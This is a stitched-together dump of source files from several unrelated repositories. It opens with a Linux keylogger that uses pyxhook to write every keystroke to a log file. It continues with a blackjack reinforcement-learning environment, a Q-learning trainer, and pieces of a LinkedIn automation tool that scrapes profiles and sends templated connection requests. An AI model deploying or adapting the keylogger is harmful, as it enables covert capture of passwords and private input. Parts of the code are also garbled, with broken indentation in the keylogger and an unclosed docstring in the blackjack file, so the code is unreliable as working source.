#### File: joshiarheinier/Python-Keylogger-Linux-/keylogger.py
```python
import pyxhook
#this function is called every time a key is pressed.
#for every key pressed, it will be recorded to a text file
#named record.log (You can edit the name and its directory)
recordfile = "record.log"
def OnKeyPress(event):
recordKey = open(recordfile,"a")
if event.Ascii==32: #32 is the ascii value of space
recordKey.write(" ")
    elif event.Ascii==13: #13 is the ascii value of <Return>
recordKey.write("\n")
elif event.Ascii==96: #96 is the ascii value of the grave key (`)
hook.cancel()
else:
recordKey.write(event.Key)
recordKey.close()
#initiate HookManager class
hook=pyxhook.HookManager()
#listen to all keys pressed
hook.KeyDown=OnKeyPress
#hook the keyboard
hook.HookKeyboard()
#start the keylogging
hook.start()
``` |
{
"source": "joshiatul/game_playing",
"score": 4
} |
#### File: game_playing/environments/blackjack.py
```python
import random
from collections import namedtuple
from . import environment
import os
# TODO Resolve for information <===> state.. unneccessary confusion
class BlackJack(environment.AbstractGame):
def __init__(self):
self.action_space = ['hit', 'stay']
super(BlackJack, self).__init__('blackjack')
def print_game_status(self):
if self.decision:
print "player decided to: " + self.decision
print "player_hand: " + str(self.player_hand) + " with value: " + str(self.player_value)
print "dealer_hand: " + str(self.dealer_hand) + " with value: " + str(self.dealer_value)
print self.game_status
@staticmethod
def random_card():
"""
Ace (1), 2, 3, 4, 5, 6, 7, 8, 9, 10, Jack (10), Queen (10), King (10)
Ace can have value of 1 or 10 based on if other card values < 10
:return: random card
"""
card = random.randint(1, 13)
if card > 10:
return 10
return card
@staticmethod
def reevaluate_value(hand):
"""
        This hard-codes when to count an ace as 11 (a 'usable ace').
        Ideally an algorithm would also learn this
        along with when to 'hit' and 'stay'
val = sum(hand)
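        # e.g. a hand of [1, 7] sums to 8, so the ace is counted as 11 for a total of 18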
if 1 in hand and val <= 11:
return val + 10
else:
return val
def add_card_to_player(self, card):
# card = random.choice([2,3,4,9,10])
#card = random.choice([10])
self.player_hand.extend([card])
self.player_value = self.reevaluate_value(self.player_hand)
def add_card_to_dealer(self, card):
# card = random.choice([9,8,3,2,4,5,6,1,7])
# card = random.choice([9, 2])
self.dealer_hand.extend([card])
self.dealer_value = self.reevaluate_value(self.dealer_hand)
def evaluate_game(self, decision=False):
"""
:return: status
"""
status = 'in process'
reward = False
if not decision:
if self.player_value == 21:
if self.dealer_value != 21:
status = 'player wins'
else:
status = 'draw'
if decision == 'stay':
if (self.dealer_value > 21):
status = 'dealer busts and player wins'
elif self.dealer_value == self.player_value:
status = 'draw'
elif self.dealer_value < self.player_value:
status = 'player wins'
elif self.dealer_value > self.player_value:
status = 'player loses'
if decision == 'hit':
if self.player_value == 21:
if self.dealer_value != 21:
status = 'player wins'
else:
status = 'draw'
elif self.player_value > 21:
status = 'player busts and loses'
elif self.player_value < 21:
status = 'in process'
        # win = 1, draw = 0, lose = -1
if status in ['player wins', 'dealer busts and player wins']:
reward = 1
elif status == 'draw':
reward = 0
elif status in ['player loses', 'player busts and loses']:
reward = -1
return status, reward
def reset(self):
self.player_hand = []
self.dealer_hand = []
self.player_value = 0
self.dealer_value = 0
self.game_status = ''
self.decision = ''
self.state = ()
self.state_info = namedtuple('state_info', ['player_value', 'dealer_value'])
self.information = None
# Player gets two cards
self.add_card_to_player(self.random_card())
self.add_card_to_player(self.random_card())
# Let's always hit if card total < 11
while self.player_value <= 11:
self.add_card_to_player(self.random_card())
# Dealer opens a single card
self.add_card_to_dealer(self.random_card())
# This card is really hidden from the player
# self.add_card_to_dealer(self.random_card())
status, reward = self.evaluate_game()
self.game_status = status
#self.state = self.state_info(self.player_value, self.dealer_value)
self.state = tuple('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state))
#self.information = self.state_info(self.player_value, self.dealer_value)
return
def evaluate_dealer(self):
"""
If player decides to stay:
the dealer always follows this policy: hit until cards sum to 17 or more, then stay.
:return:
"""
while self.dealer_value < 17:
self.add_card_to_dealer(self.random_card())
def step(self, decision):
self.decision = decision
if decision == 'stay':
# Evaluate game, dealer plays
self.evaluate_dealer()
status, reward = self.evaluate_game(decision)
if decision == 'hit':
# If hit, add new card to player's hand
self.add_card_to_player(self.random_card())
status, reward = self.evaluate_game(decision)
self.game_status = status
#self.state = self.state_info(self.player_value, self.dealer_value)
self.state = tuple(('-'.join([i, str(j)]) for i, j in zip(self.state._fields, self.state)))
#self.information = self.state_info(self.player_value, self.dealer_value)
# Needs to return <observation, reward, done, info>
done = True if self.game_status != 'in process' else False
return self.state, reward, done, []
def complete_one_episode(self, banditAlgorithm, model=None):
all_decision_states = []
while self.game_status == 'in process':
# self.print_game_status()
state = self.state_info(self.player_value, self.dealer_value)
decision, prob = banditAlgorithm.select_decision_given_state(state, self.action_space, model=model, algorithm='epsilon-greedy')
# Only terminal state returns a valid reward
# Needs to return <observation, reward, done, info> gym compatible
observation, reward, done, info = self.step(decision)
all_decision_states.append((state, decision))
all_decision_states_tuple = tuple(all_decision_states)
return all_decision_states_tuple, reward
```
#### File: joshiatul/game_playing/rl_learning.py
```python
from model import Model
import bandits
import random
import time
import cPickle as pickle
from collections import Counter, deque
import numpy as np
import os
from environments.environment import Environment
import threading
import multiprocessing
from multiprocessing.managers import BaseManager
from itertools import izip
# http://stackoverflow.com/questions/26499548/accessing-an-attribute-of-a-multiprocessing-proxy-of-a-class
# http://stackoverflow.com/questions/28612412/how-can-i-share-a-class-between-processes-in-python
def play_with_environment(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id=1,
train=True, display_state=False):
"""
Simple temporal difference learning
with experience-replay
:return:
"""
env = make_environment(environment_params)
epsilon = bandit_params.get('start_epsilon', 0.9)
end_epsilon = bandits.sample_end_epsilon()
model_class = 'random' if not model else model.return_model_class()
X, y = [], []
if train and rl_params.get('memory_structure', 'asynchronus_methods') == 'experience_replay':
experience_replay_obs = ExperienceReplay(type='deque',
batchsize=rl_params['memory_structure_params']['batchsize'],
experience_replay_size=rl_params['memory_structure_params'][
'experience_replay_size'],
minibatch_method=rl_params['memory_structure_params'][
'minibatch_method'])
if train:
print "------ Starting thread: " + str(thread_id) + " with final epsilon ", end_epsilon
time.sleep(3 * thread_id)
for episode in xrange(1, epochs + 1):
if not train and display_state: print "Game #-----: " + str(episode)
# Initialize game and per episode counters
current_state = env.reset()
total_episodic_reward = 0
episodic_max_q = 0
if train and model.if_exists():
epsilon = bandits.decrement_epsilon(epochs, epsilon, bandit_params.get('anneal_epsilon_timesteps', 10000),
end_epsilon)
# Start playing the game
for move in xrange(1, rl_params['max_steps'] + 1):
if display_state: env.render()
episodic_rewards = []
states = []
# Look n step ahead
for _ in xrange(rl_params.get('n_steps_ahead', 1)):
# Figure out best action based on policy
action, max_q_value = bandits.select_action_with_epsilon_greedy_policy(current_state, env.action_space,
model,
epsilon=epsilon, test=not train)
# Take step / observe reward / preprocess / update counters
if not train and display_state: print "Taking action: #-----: " + str(action)
new_state, reward, done, info = env.step(action)
clipped_reward = env.clip_reward(reward, done)
episodic_rewards.append(clipped_reward)
states.append(current_state)
total_episodic_reward += reward
td_error = clipped_reward - max_q_value
episodic_max_q += max_q_value
# Update state
current_state = new_state
if done:
break
if train:
bootstrapped_reward = return_bootstrapped_reward(env, model, new_state, done)
for i in xrange(len(episodic_rewards) - 1, -1, -1):
bootstrapped_reward = episodic_rewards[i] + rl_params['gamma'] * bootstrapped_reward
if rl_params['memory_structure'] == 'experience_replay':
X, y = generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y,
episode_key=(episode, move),
gamma=rl_params['gamma'],
state_tuple=(
states[i], action,
bootstrapped_reward, new_state,
done, episode,
move, td_error))
else:
X_new, y_new = model.return_design_matrix((states[i], action), bootstrapped_reward, weight=1)
X.append(X_new)
y.append(y_new)
# Train model and reset design matrix
model.fit(X, y)
X, y = [], []
# Check game status and break if you have a result (printing only makes sense for gridworld)
if done:
if not train and display_state and clipped_reward > 0: print 'Player WINS!'
if not train and display_state and clipped_reward < 0: print 'Player LOSES!'
break
# Record end of the episode statistics
statistics.record_episodic_statistics(done, episode, move, clipped_reward, total_episodic_reward,
episodic_max_q,
epsilon=epsilon, train=train, model_class=model_class,
thread_id=thread_id)
# if train:
# if thread_id == 4 and episode % 2000 == 0 and episode != epochs:
# print "Saving model and continuing------------------"
# model.save_and_continue()
if not train:
statistics.calculate_summary_statistics(model)
return statistics.result
else:
print "------ Finishing thread: " + str(thread_id) + " -------------------------"
def return_bootstrapped_reward(env, model, new_state, done):
if not done and model.if_exists(): # non-terminal state
# Get value estimate for that best action and update EXISTING reward
max_q_action, max_q_value = bandits.return_action_based_on_greedy_policy(new_state, model, env.action_space)
else:
max_q_value = 0
return max_q_value
class Statistics(object):
def __init__(self, base_folder_name, test):
self.total_reward = 0
self.total_steps = 0
self.total_episodes = 0
self.result_file = open(base_folder_name + '/result.data', 'w') if not test else None
self.result = {}
self.batch_mse_stat = []
def record_episodic_statistics(self, done, episode, total_moves, step_reward, total_episodic_reward, episodic_max_q,
epsilon, train=True,
model_class=None, thread_id=1):
"""
For now record statistics only if episode is ended OR max steps are done
"""
avg_max_q = episodic_max_q * 1.0 / total_moves
res_line = 'Episode:{0}, total_steps:{1}, total_reward:{2}, final_reward:{3}, avg_q_value:{4}, epsilon:{5}, thread:{6}'.format(
episode,
total_moves,
total_episodic_reward,
round(step_reward, 4),
round(episodic_max_q),
round(epsilon, 4),
thread_id)
if train:
# print res_line
self.result_file.write(res_line + "\n")
self.total_reward = total_episodic_reward
self.total_episodes = episode
model_type = 'random' if not model_class else model_class
if model_type not in self.result:
self.result[model_type] = Counter()
if done:
if total_episodic_reward > 0:
self.result[model_type]['player wins'] += 1
else:
self.result[model_type]['player loses'] += 1
else:
self.result[model_type]['in process'] += 1
def calculate_summary_statistics(self, model_class=None):
model_type = 'random' if not model_class else model_class
if model_type in self.result:
            self.result[model_type]['average_reward_per_episode'] = round(
self.total_reward * 1.0 / max(self.total_episodes, 1), 2)
self.total_reward = 0
self.total_episodes = 0
try:
self.result_file.close()
except:
pass
class ModelManager(BaseManager):
pass
def train_with_threads(environment_params, rl_params, bandit_params, model_params, epochs, num_of_threads, train=True,
display_state=False, use_processes=False):
start_time = time.time()
# Initialize statistics and model here and pass it as an argument
test = not train
model_params['base_folder_name'] = return_base_path(environment_params['env_name'])
model_params['actor_critic_model'] = rl_params['memory_structure_params'].get('actor_critic_method', False)
statistics = Statistics(base_folder_name=model_params['base_folder_name'], test=test)
env_name = 'non_atari' if environment_params['env_name'] == 'gridworld' else 'atari'
resume = model_params.get('resume', False)
if not use_processes:
model = Model(model_params)
model.initialize(test, resume)
actor_learner_threads = [
threading.Thread(target=play_with_environment_pong if env_name == 'atari' else play_with_environment, args=(
environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id, train, display_state))
for
thread_id in xrange(1, num_of_threads + 1)]
# Multiprocessing process
else:
# We will need to register Model class if we want to share model object
ModelManager.register('Model', Model)
manager = ModelManager()
manager.start()
model = manager.Model(model_params)
model.initialize(test, resume)
actor_learner_threads = [
multiprocessing.Process(target=play_with_environment_pong if env_name == 'atari' else play_with_environment,
args=(
environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id,
train, display_state)) for
thread_id in xrange(1, num_of_threads + 1)]
for t in actor_learner_threads:
t.start()
for t in actor_learner_threads:
t.join()
if train: model.finish()
# statistics.calculate_summary_statistics(model.return_model_class())
print "elapsed time:" + str(int(time.time() - start_time))
# return statistics.result
def return_base_path(name):
directory = os.path.dirname(os.path.realpath(__file__)) + '/solved_environments/' + name
if not os.path.exists(directory):
os.makedirs(directory)
return directory
def make_environment(environment_params):
if environment_params['env_name'] == 'gridworld':
from environments.gridworld import GridWorld
env = GridWorld(environment_params['grid_size'])
else:
env = Environment(environment_params['env_name'], grid_size=environment_params['grid_size'],
last_n=environment_params['last_n'],
delta_preprocessing=environment_params['delta_preprocessing'])
return env
def test_trained_model_with_random_play(environment_params, test_games, render=False):
print "---------- Testing policy:-----------"
base_folder = return_base_path(environment_params['env_name'])
model = pickle.load(open(base_folder + '/model_obs.pkl', mode='rb'))
model.initialize(test=True)
statistics = Statistics(base_folder_name=base_folder, test=True)
# First test with trained model
print "---------- Testing trained VW model -------"
if environment_params['env_name'] == 'gridworld':
play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={},
epochs=test_games, train=False, display_state=render)
else:
play_with_environment_pong(environment_params, model, statistics, rl_params={},
bandit_params={'start_epsilon': 0.0}, epochs=test_games, thread_id=8, train=False,
display_state=True)
# Now with random model
print "---------- Testing Random model -----------"
model = None
if environment_params['env_name'] == 'gridworld':
play_with_environment(environment_params, model, statistics, rl_params={'max_steps': 30}, bandit_params={},
epochs=test_games, train=False, display_state=False)
else:
play_with_environment_pong(environment_params, model, statistics, rl_params={}, bandit_params={},
epochs=test_games, thread_id=1, train=False,
display_state=render)
return statistics.result
# ------- Pong functions TEST ------------------------------------------------------
def choose_action_greedy_policy(current_sparse_state, model, action_space):
q_value_table = []
for a in action_space:
fv = current_sparse_state + " |decision action_" + str(a)
q_value_table.append(model.predict(fv))
max_value = max(q_value_table)
max_index = q_value_table.index(max_value)
return action_space[max_index]
def play_with_environment_pong(environment_params, model, statistics, rl_params, bandit_params, epochs, thread_id,
train=True, display_state=False):
gamma = rl_params.get('gamma', 0.99) # discount factor for reward
model_trained = False if train or not model else True
epsilon = bandit_params.get('start_epsilon', 0.5)
np.random.seed(0)
end_epsilon = bandits.sample_end_epsilon()
anneal_epsilon_timesteps = bandit_params.get('anneal_epsilon_timesteps', 2000)
env = make_environment(environment_params)
# env.env.seed(1)
xs, drs, dm = [], [], []
running_reward = None
for episode_number in xrange(1, epochs + 1):
reward_sum = 0
observation = env.reset() # reset env
current_sparse_state = env.preprocess_and_sparsify(observation)
for _ in xrange(10000):
if display_state:
time.sleep(0.01)
env.render()
# Based on epsilon-greedy choose action
if model_trained:
if np.random.random() > epsilon:
action = choose_action_greedy_policy(current_sparse_state, model, env.action_space)
else:
action = np.random.choice(env.action_space)
else:
action = np.random.choice(env.action_space)
# record state (per vw sparse representation)
xs.append(current_sparse_state + " |decision action_" + str(action))
# step the environment and get new measurements
observation, reward, done, info = env.step(action)
reward_sum += reward
# record reward (has to be done after we call step() to get reward for previous action)
drs.append(reward)
# re-compute current_sparse_state
current_sparse_state = env.preprocess_and_sparsify(observation)
if reward != 0:
running_add = 0
for iw, fv in izip(reversed(drs), reversed(xs)):
running_add = running_add * gamma * 1.0 + iw
pos_fv = str(running_add) + " " + fv
dm.append(pos_fv)
if train:
model.fit(dm, y=[])
model_trained = True
xs, drs, dm = [], [], [] # reset array memory
if done: # an episode finished
if epsilon > end_epsilon:
epsilon -= ((1.0 - end_epsilon) / anneal_epsilon_timesteps)
epsilon = max(epsilon, end_epsilon)
# Keep track of running reward
running_reward = reward_sum if running_reward is None else running_reward * 0.99 + reward_sum * 0.01
if train:
model.compute_running_reward(episode_number, thread_id, reward_sum, running_reward, epsilon)
else:
print 'Episode: %d resetting env. episode reward total was %f. running mean: %f' % (
episode_number, reward_sum, running_reward)
statistics.record_episodic_statistics(done, episode=episode_number, total_moves=_,
step_reward=reward_sum, total_episodic_reward=running_reward,
episodic_max_q=running_reward,
epsilon=epsilon, train=train, model_class='async',
thread_id=thread_id)
break
# -------------- Experience-replay Class and Methods --------------------------------------------------
class ExperienceReplay(object):
def __init__(self, type, batchsize, experience_replay_size, minibatch_method='random'):
self.type = type
self.experience_replay_size = experience_replay_size
self.minibatch_method = minibatch_method
self.experience_replay = None
self.batchsize = batchsize
self.all_indices = range(experience_replay_size)
# For stratified sampling
self.positive_sample_fraction = 0.1
self.positive_batchsize = int(self.batchsize * self.positive_sample_fraction)
self.negative_batchsize = self.batchsize - self.positive_batchsize
self.experience_replay_positive = None
self.experience_replay_negative = None
self.positive_indices = range(int(experience_replay_size * self.positive_sample_fraction))
self.negative_indices = range(int(experience_replay_size * (1 - self.positive_sample_fraction)))
self.max_positive_idx = None
self.initialize()
def initialize(self):
if self.type == 'deque':
self.experience_replay = deque(maxlen=self.experience_replay_size)
pos_size = int(self.experience_replay_size * self.positive_sample_fraction)
self.experience_replay_positive = deque(maxlen=pos_size)
neg_size = self.experience_replay_size - pos_size
self.experience_replay_negative = deque(maxlen=neg_size)
# elif self.type == 'dict':
# # {(episode, move): state_action_reward_tuple}
# self.experience_replay = OrderedDict()
def store_for_experience_replay(self, state_tuple, episode_move_key=None):
old_state, best_known_decision, cumu_reward, new_state, done, episode, move, td_error = state_tuple
if len(old_state) > 0 and len(new_state) > 0:
if self.type == 'deque':
if self.minibatch_method != 'stratified':
self.experience_replay.appendleft(state_tuple)
else:
if cumu_reward > 0:
self.experience_replay_positive.appendleft(state_tuple)
else:
self.experience_replay_negative.appendleft(state_tuple)
# elif self.type == 'dict' and episode_move_key:
# if len(self.experience_replay) == self.experience_replay_size:
# _ = self.experience_replay.popitem(last=False)
# self.experience_replay[episode_move_key] = state_tuple
def return_minibatch(self):
if self.minibatch_method == 'random':
if self.type == 'deque':
minibatch_indices = random.sample(self.all_indices, self.batchsize)
# elif self.type == 'dict':
# minibatch_indices = random.sample(self.experience_replay.keys(), self.batchsize)
# Only work with deque type
elif self.minibatch_method == 'prioritized':
# Simple prioritization based on magnitude of reward
total_reward_in_ex_replay = sum(
max(abs(st[7]), (1.0 / self.experience_replay_size)) for st in self.experience_replay)
probs = tuple(
(max(abs(st[7]), (1.0 / self.experience_replay_size)) * 1.0 / total_reward_in_ex_replay for st in
self.experience_replay))
            minibatch_indices = list(np.random.choice(self.all_indices, self.batchsize, p=probs))
# Only work with deque type
elif self.minibatch_method == 'stratified':
if len(self.experience_replay_positive) >= self.positive_batchsize:
minibatch_indices_positive = random.sample(self.positive_indices, self.positive_batchsize)
else:
minibatch_indices_positive = self.positive_indices
minibatch_indices_negative = random.sample(self.negative_indices, self.negative_batchsize)
# First positive indices and then negative indices - keep track of this
minibatch_indices = minibatch_indices_positive + minibatch_indices_negative
self.max_positive_idx = len(minibatch_indices_positive)
return minibatch_indices
def return_minibatch_sample(self, index, count=None):
if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized':
result = self.experience_replay[index]
elif self.minibatch_method == 'stratified':
try:
if count < self.max_positive_idx:
result = self.experience_replay_positive[index]
else:
result = self.experience_replay_negative[index]
except Exception as e:
print e
return result
def start_training(self):
"""
Start training only if experience replay memory is full
"""
if self.minibatch_method == 'random' or self.minibatch_method == 'prioritized':
start = False if len(self.experience_replay) < self.experience_replay_size else True
elif self.minibatch_method == 'stratified':
start = False if len(self.experience_replay_positive) + len(
self.experience_replay_negative) < self.experience_replay_size else True
return start
def generate_training_samples_with_experience_replay(experience_replay_obs, env, model, X, y, episode_key, gamma,
state_tuple):
experience_replay_obs.store_for_experience_replay(state_tuple, episode_key)
# Start training only after buffer is full
if experience_replay_obs.start_training():
# randomly sample our experience replay memory
minibatch = experience_replay_obs.return_minibatch()
# Now for each gameplay experience, update current reward based on the future reward (using action given by the model)
for idx, index in enumerate(minibatch):
example = experience_replay_obs.return_minibatch_sample(index, count=idx)
current_state, action, bootstrapped_reward, new_state, done, episode, move, td_error = example
X_new, y_new = model.return_design_matrix((current_state, action), bootstrapped_reward, weight=1)
X.append(X_new)
y.append(y_new)
return X, y
``` |
{
"source": "JoshiAyush/LinkedIn-Automator",
"score": 2
} |
#### File: lib/utils/net.py
```python
from typing import List
import platform
import subprocess
def ping(host: str = None) -> bool:
"""Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host
name is valid.
We avoid 'os.system' calls with 'subprocess.call' to avoid shell injection
vulnerability.
:Args:
- host: {str} Hostname.
:Returns:
- {bool} True if server responds, false otherwise.
"""
if not host:
host = "google.com"
if platform.system().lower() == "windows":
param = "-n"
else:
param = "-c"
command: List[str] = ["ping", param, '1', host]
return subprocess.call(command, stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) == 0
```
#### File: lib/utils/type.py
```python
from __future__ import annotations
from typing import Any
def _type(t: Any) -> str:
"""Function _type() returns the class name of the object given.
:Args:
- t: {Any} Object we need to find the class name for.
:Returns:
- {str} Class name if __name__ attribute is present otherwise None.
"""
try:
return t.__name__
except AttributeError:
return None
"""Function is_int() returns True if the instance given is an int.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an int otherwise False.
"""
is_int: function = lambda field: isinstance(field, int)
"""Function is_str() returns True if the instance given is an str.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an str otherwise False.
"""
is_str: function = lambda field: isinstance(field, str)
"""Function is_list() returns True if the instance given is an list.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is an list otherwise False.
"""
is_list: function = lambda field: isinstance(field, list)
"""Function is_none() returns True if the instance given is None.
:Args:
- field: {Any} Instance.
:Returns:
- {bool} True if the instance is None otherwise False.
"""
is_none: function = lambda field: field is None
def is_empty(field: str) -> bool:
"""Function is_empty() returns True if the instance given is empty.
:Args:
- field: {str} Instance.
:Returns:
- {bool} True if the given instance is empty otherwise False.
"""
if is_str(field):
return field.strip() == ''
return False
def is_present(obj: Any, field: Any) -> bool:
"""Function is_present() returns True if the instance given contains the obj.
:Args:
- field: {Any} Instance.
- obj: {Any} Instance to find.
:Returns:
- {bool} True if the instance given contains obj otherwise False.
"""
if not is_int(field):
return obj in field
return False
```
#### File: linkedin/message/template.py
```python
from __future__ import annotations
from typing import Dict
import os
import json
import random
import datetime
from errors import (
TemplateFileException,
TemplateFileNotSupportedException,
TemplateMessageLengthExceededException,
)
MY_NAMES = [
'{{my_name}}', '{{my_first_name}}', '{{my_last_name}}',
'{{my_company_name}}', '{{my_position}}', ]
NAMES = [
'{{name}}', '{{first_name}}', '{{last_name}}',
'{{current_company}}', *MY_NAMES, ]
OTHERS = [
'{{keyword}}', '{{location}}', '{{industry}}', '{{title}}',
'{{school}}', '{{profile_language}}', '{{my_position}}',
'{{position}}', '{{year}}', ]
SUPPORTED_TEMP_FILES = ['.txt', ]
DEFAULT_LANG = 'en-US'
VAR_BEGN_BLK = 'VARIABLE BEGIN:'
VAR_END_BLK = 'VARIABLE END;'
TEMPL_BEGN_BLK = 'TEMPLATE BEGIN:'
TEMPL_END_BLK = 'TEMPLATE END;'
TEMPL_AVAIL = [
'template_business', 'template_sales', 'template_real_estate',
'template_creative_industry', 'template_hr', 'template_include_industry',
'template_ben_franklin', 'template_virtual_coffee',
'template_common_connection_request', ]
TEMPL_FILE_PATH = os.path.join(os.path.abspath(__file__)[0:os.path.abspath(__file__).find('template.py'):], 'templates.json')
class Template:
def __init__(
self: Template, message_template: str,
*, var_template: str, grammar_check: bool = True,
use_template: str = None) -> None:
if message_template is None:
if use_template is None:
return
else:
self._message = self.get_template_by_name(use_template)
if use_template == 'template_common_connection_request':
self._message = random.choice(self._message)
elif os.path.isfile(message_template):
self._message = self.load_message(message_template)
else:
self._message = message_template
self.var_template = var_template
self._enable_language_tool = grammar_check
if self._enable_language_tool:
import language_tool_python
self._language_tool = language_tool_python.LanguageTool(
language=DEFAULT_LANG)
@staticmethod
def get_template_by_name(name: str) -> str:
if not name in TEMPL_AVAIL:
raise TemplateFileException(
f"Invalid template! Use any of these {TEMPL_AVAIL}")
else:
with open(TEMPL_FILE_PATH, 'r') as templ_file:
data = json.load(templ_file)
return data[name]
    def set_data(self: Template, data: Dict[str, str]) -> None:
        self._data = {
            '{{name}}': data.pop('name', None),
            '{{first_name}}': data.pop('first_name', None),
            '{{last_name}}': data.pop('last_name', None),
            '{{keyword}}': data.pop('keyword', None),
            '{{location}}': data.pop('location', None),
            '{{industry}}': data.pop('industry', None),
            '{{title}}': data.pop('title', None),
            '{{school}}': data.pop('school', None),
            '{{current_company}}': data.pop('current_company', None),
            '{{profile_language}}': data.pop('profile_language', None),
            '{{position}}': data.pop('position', None),
            '{{year}}': data.pop('year', str(datetime.datetime.now().year)),
        }
if self.var_template is not None and os.path.isfile(self.var_template):
self.load_variable(self.var_template)
    @staticmethod
    def check_if_file_is_supported(path: str) -> bool:
        return any(path.endswith(ext) for ext in SUPPORTED_TEMP_FILES)
@staticmethod
def load_message(path: str) -> str:
if Template.check_if_file_is_supported(path) is False:
raise TemplateFileNotSupportedException(
'Template file %(file)s is not supported!' %
{'file': path})
with open(path, 'r') as templ_file:
message = templ_file.read()
return message[message.find(TEMPL_BEGN_BLK)+len(TEMPL_BEGN_BLK):message.find(TEMPL_END_BLK):]
def load_variable(self: Template, path: str) -> str:
if self.check_if_file_is_supported(path) is False:
raise TemplateFileNotSupportedException(
'Template file %(file)s is not supported!' %
{'file': path})
with open(path, 'r') as templ_file:
variables = templ_file.read()
variables = variables[variables.find(VAR_BEGN_BLK)+len(VAR_BEGN_BLK):variables.find(VAR_END_BLK):]
variables = variables.split('\n')
for var in variables:
if var == '':
continue
var_, val = var.split('=')
var_ = var_.strip()
if var_ in MY_NAMES:
self._data = {**self._data, **{var_: val.strip()}}
else:
raise TemplateFileException(
f"Variables other than {MY_NAMES} are not currently supported, you gave {var_}!")
    def parse(self: Template) -> str:
        def common_connection_request_random_choice() -> str:
            with open(TEMPL_FILE_PATH, 'r') as file:
                data = json.load(file)
            return random.choice(data['template_common_connection_request'])
        def check_if_templ_variable_missing(var: str) -> bool:
            return var in self._data and self._data[var] is None and self._message.find(var) > -1
        message = self._message
        for var in OTHERS:
            if var in self._data and self._data[var]:
                message = message.replace(var, self._data[var])
            elif check_if_templ_variable_missing(var):
                # Fall back to a random common connection request template and re-parse.
                self._message = common_connection_request_random_choice()
                return self.parse()
        if self._enable_language_tool:
            message = self._language_tool.correct(message)
        for var in NAMES:
            if var in self._data and self._data[var]:
                message = message.replace(var, self._data[var])
            elif check_if_templ_variable_missing(var):
                self._message = common_connection_request_random_choice()
                return self.parse()
        return message
def read(self: Template) -> str:
message = self.parse()
        if len(message) > 300:
            raise TemplateMessageLengthExceededException(
                'Personalized message length cannot exceed 300 characters, you gave %(characters)s characters'
                % {'characters': len(message)})
return message
```
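To make the Template API above easier to follow, here is a hedged usage sketch. The import path matches the test files in this repo; the template text and profile values are made up for illustration, and grammar checking is disabled so `language_tool_python` is not needed.
```python
from linkedin.message import Template

# Build a template directly from a string rather than a template file.
template = Template(
    "Hi {{first_name}}, I came across your work at {{current_company}} "
    "and would love to connect.",
    var_template=None,
    grammar_check=False)

# set_data() maps plain keys onto the {{...}} placeholders used by parse().
template.set_data({
    'first_name': 'Ada',
    'current_company': 'Example Corp',
})

# read() parses the template and enforces the 300 character limit.
print(template.read())
# roughly: "Hi Ada, I came across your work at Example Corp and would love to connect."
```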
#### File: linkedin/person/__init__.py
```python
from __future__ import annotations
import re
import sys
import json
import nameparser
from typing import (
Union,
TextIO,
)
from selenium import webdriver
class Path_To_Element_By(object):
SUGGESTION_BOX_ELEMENT_XPATH = '/html/body/div[6]/div[3]/div/div/div/div/div[2]/div/div/main/div[3]/section/section/section/div/ul/li[1]'
SEARCH_RESULTS_PEOPLE_XPATH_PRM = '//*[@id="main"]/div/div/div[2]/ul/li[1]'
SEARCH_RESULTS_PEOPLE_XPATH_SEC = '//*[@id="main"]/div/div/div[3]/ul/li[1]'
class Person_Info(object):
"""Class Person_Info provides an object with person's necessary details fetched
from linkedin's page.
"""
def __init__(
self: Person_Info, *, name: str = None, occupation: str = None,
profile_url: str = None, photo_url: str = None,
location: str = None, summary: str = None,
connect_button: webdriver.Chrome = None) -> None:
"""Constructor method initializes the Person_Info object with basic details
about the person.
:Args:
- self: {Person_Info} self.
- name: {str} person's name.
- occupation: {str} person's occupation.
- profile_url: {str} person's linkedin profile url.
- photo_url: {str} person's linkedin profile photo url.
- connect_button: {webdriver.Chrome} person's connect button instance.
"""
self.name = name
name_ = nameparser.HumanName(self.name)
self.first_name = name_.first
self.last_name = name_.last
self.occupation = occupation
self.profile_url = profile_url
if "?" in photo_url:
self.photo_url = photo_url.split("?")[0]
else:
self.photo_url = photo_url
self.connect_button = connect_button
self.location = location
self.summary = summary
self.id = self.person_id()
    def person_id(self: Person_Info) -> str:
        """Method person_id() returns the person id parsed out of the person's profile url.
        :Args:
        - self: {Person_Info} self.
        :Returns:
        - {str} person id, or None if the profile url does not contain one.
        """
        if not self.profile_url:
            return None
        _re = re.compile(r"([a-z]+-?)+([a-zA-Z0-9]+)?", re.IGNORECASE)
        match = _re.search(self.profile_url)
        return match.group() if match else None
def freeze(
self: Person_Info,
file: Union[str, TextIO] = sys.stdout,
mode: str = "w",
_format: str = None
) -> None:
"""Method freeze() dumps the current object state in the given file in the given format.
:Args:
- self: {Person_Info} self.
- file: {Union[str, TextIO]} file to dump the current object state in.
- mode: {str} in what mode to open the file in.
- _format: {str} in what format to write the data in.
:Raises:
- {Exception} if the format and the file is not identified.
"""
message = ''
        if _format == "json":
            message = json.dumps({
                "name": self.name,
                "person_id": self.id,
                "occupation": self.occupation,
                "profile_url": self.profile_url,
                "photo_url": self.photo_url,
                "location": self.location,
                "summary": self.summary})
        elif _format == "raw":
            message = ("name: %(name)s\n" +
                       "person_id: %(person_id)s\n" +
                       "occupation: %(occupation)s\n" +
                       "profile_url: %(profile_url)s\n" +
                       "photo_url: %(photo_url)s\n" +
                       "location: %(location)s\n" +
                       "summary: %(summary)s") % {
                "name": self.name,
                "person_id": self.id,
                "occupation": self.occupation,
                "profile_url": self.profile_url,
                "photo_url": self.photo_url,
                "location": self.location,
                "summary": self.summary}
else:
raise Exception("Format '%(frmt)s' is not supported!" %
{"frmt": _format})
        if isinstance(file, str):
            with open(file=file, mode=mode) as file_handle:
                if file.endswith(".json"):
                    json.dump(message, file_handle, indent=2)
                else:
                    file_handle.write(message)
            return
elif file == sys.stdout:
file.write(message)
else:
raise Exception("File '%(file)s' is not supported!" %
{"file": file})
```
